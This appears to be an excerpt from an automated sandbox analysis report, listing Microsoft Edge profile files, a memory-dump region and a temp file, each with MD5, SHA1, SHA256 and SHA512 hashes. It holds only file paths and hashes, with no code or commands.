C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL
| MD5 | 0fe257e6dcfdf285494cedd407557b2a |
| SHA1 | 5912049f075037d90a62a7757e47a7929684b9af |
| SHA256 | 99879026e487d0ab47e794961102257ef3edcd2d80b00b83cf882043ca428d15 |
| SHA512 | 918e71c5c1b8bbcf2c181b165443da346d646611d26896afe5aa7e0a2caa850905e8c2ae734e0b32154c1e3ff9a1fe94346e38317fd7f32dfe9c3c3b621f8208 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | ce6d14f00a6e0c01a6d6f55cdc4ee930 |
| SHA1 | e3f4b57330e67888c808178be531726e0993c016 |
| SHA256 | 70180cc75b37a1822a2cdd518beffcf8f71851d810508cc201f0aa72130e5f1f |
| SHA512 | 0da05824a5694baa2a9725d76fb9780a71d9d966f35a947064ecfbdddf15da2232a82f517c5d5840ffe23dda29ad341fff648467858ff9b30113c0b3b1ade482 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
| MD5 | a21896e163194b58ba2604e24038a2d9 |
| SHA1 | a10103307c73422bac2824fc531db70dfb94e26b |
| SHA256 | 1172e7260b301036dcd37bac770bda801a790a7680b875c908d562003efced83 |
| SHA512 | ac06392c2bd6f0d81efd558e1f7d79065eeb4d17a74ae44acb9b0aeef7a0b1d85e22ccd5dfeee65891eca664c9c6c3c711e235ec9be11305e6444d2730a202bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 9796b8f92b226995c58bad2c3b07ac01 |
| SHA1 | 9d905016de5bfb1eaa75fb871d1d01dc58289f53 |
| SHA256 | 89ce2102216cf57d0fab519e78b0e609fe13c8893f66f13cf4a8474a2b3d7476 |
| SHA512 | baa8572e0149bc74b78312a04d428248a1e5306e057500dda5e4f7087c3109a36e1eb80c25a8bf7795aee4f4c4436c68c72b889a6184e6b62a3f91415a63f277 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 625a420632ffdffc4fbc5984fc2055de |
| SHA1 | 09b2965fa867a1bb10337783a2dc5d837debc095 |
| SHA256 | 740bb1747fd60aab3e731543e0a6bd947deb6fc419e499f3867d735de9d30b63 |
| SHA512 | eedbdc958611230c6351ab3e45a266b1d73fde7a293a2ab8b11db292bef477901cf6482eccd2d76389732069fe6b648fb1327522e103f0f88b83fb5454c9d8e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 9110d2ab84ff06a17821f84d2007469d |
| SHA1 | 29effdc4d8821dc1bd4cf2bc4b5edeecb00361f6 |
| SHA256 | 1902707b9deccef32f9ad646c7a4c4d862f96d19e3b7dd0790ece3c155467907 |
| SHA512 | 7a26aad3f74965adfd6e8cc7096592cb651537f7493207bb642e2de9fed70ab5030695702e2904f02e14d77db5b1ce1c34e7297c4965aff683276b4bde47d28d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004
| MD5 | 031d6d1e28fe41a9bdcbd8a21da92df1 |
| SHA1 | 38cee81cb035a60a23d6e045e5d72116f2a58683 |
| SHA256 | b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da |
| SHA512 | e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
| MD5 | da779918df84115a4efd2a552dea0d2a |
| SHA1 | f721f2574b31fe11f8f495382ceb44e045be1e78 |
| SHA256 | 334080ffd2ce9c89a75425e138aac8077cad9f14cb189907ddb99cde4450514e |
| SHA512 | f0b74bedb7d7ddfdcaa7d346e0a370f978284830a7f865aba34cb432eb5b989f78492e466bc53c76076c56137a4bfef40cc437d7560a8ad3f4d6df5a1ac31e39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 441c260eef8ed9f11fd5fedd20f0e033 |
| SHA1 | 6fb34d0f47535aef5dde743b6998344ee76fee27 |
| SHA256 | 69e98c146b2ecc2c49832da28249e9d18fa494e18082674d6d20cc2f8642b00a |
| SHA512 | 32b15f043a22e6fd5f6b2024ef86d3f68c1a99a728a41c70ae63bf23489486385b316c89cee167f0a328a61d7610d3b68e7c3ed3ba2267ea4b0334022951c816 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | f26561a46f52285db2512568c5504a26 |
| SHA1 | 0a3a3aa6c3004f3a55ae3d3f97f6392e62bfadd1 |
| SHA256 | 82dd18c6315d1b1d82cab232ad935a3184e94e69a5fd5f9a08fc431bd01ce35b |
| SHA512 | 3087e08072e52f8890f1c41881feb2b98452df3983f5b9934b18c10a527eccf1218cee27c45cdc3711b00fd54f34f1b9206593de7098bbbf4059c1b26f69cdd7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | 40f4430541d517650de68a66cd05166b |
| SHA1 | 3952898583cc84ca77961fe857b05b369b8009e4 |
| SHA256 | 59aadce4a1e785eaea05551ac5f22d27c83be62c375b57ee9e85312851f00e33 |
| SHA512 | 3368b98ba57ad3764fa3b5f42a8ea7da31cc64fb88c0444887aebcd2637f74919caf3ca02c17d357200cab7a059c06b58c498b060eb5168137810442fc752c29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | 5c13582d721d8d96909956a503328c69 |
| SHA1 | 3b9993f60ec64569c681e1f9143ff062982cd05c |
| SHA256 | c85fa5102242656889dd23ad6528585078cce533e3e8300ce7d7a183c178eaed |
| SHA512 | bf1f2a261ad6c579a4240d57986923763155437257d3a276a4594e9dce1de66dc440151b0228600c54fdea20a631cd0e52f5a873fcd1ea0b2120a577e81c18fc |
memory/2308-1777-0x000000001BC70000-0x000000001BD90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpD114.tmp.dat
| MD5 | 87210e9e528a4ddb09c6b671937c79c6 |
| SHA1 | 3c75314714619f5b55e25769e0985d497f0062f2 |
| SHA256 | eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1 |
| SHA512 | f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0 |